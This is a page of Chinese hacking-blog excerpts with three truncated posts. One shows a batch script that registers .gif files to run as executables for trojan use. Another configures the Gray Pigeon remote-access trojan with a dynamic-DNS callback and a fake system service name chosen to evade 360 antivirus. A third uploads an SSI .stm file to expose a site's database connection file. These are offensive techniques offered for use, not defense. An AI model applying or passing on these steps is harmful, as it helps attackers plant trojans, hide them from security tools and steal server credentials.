摘要:
你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。 更改exe为gif: @echo off color 1A ECHO Windows Registry Editor Version 5.00>gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg ECHO "Content Type"="application/x-msdownload">>gif.reg ECHO @=&quo 阅读全文
摘要:
灰鸽子上线原理:本地木马控制端通过访问固定网络(我们申请的空间),来获取与宿主机的连接,从而进行控制。1、配置灰鸽子(表管DNS上线和FTP上线了,省的越搞越迷糊)①申请空间:在3322申请免费空间,建立动态域名刚申请的hahack,域名就是hahack.3322.orgb、\"安装选项\"里填上$(WinDir)\\system32\\smlogsvc.exec、\"启动项设置\"里填上 显示名称:SysmonLog 服务名称:SysmonLog 描述信息:Performance Logs and Alerts Service改这些为过360,剩下的别 阅读全文
摘要:
阅读全文
摘要:
当网站不允许上传 asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了! 原来就是如上所说的, <!--#include file="conn.asp"--> 就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.h 阅读全文